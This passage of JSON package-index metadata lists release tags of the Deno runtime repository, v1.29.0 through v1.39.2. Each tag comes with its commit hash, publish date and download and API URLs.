40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.1/manifests"},{"name":"v1.29.0","sha":"0d4e4af7acf82c1365999a7281910daa05f0e982","kind":"commit","published_at":"2022-12-14T23:22:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz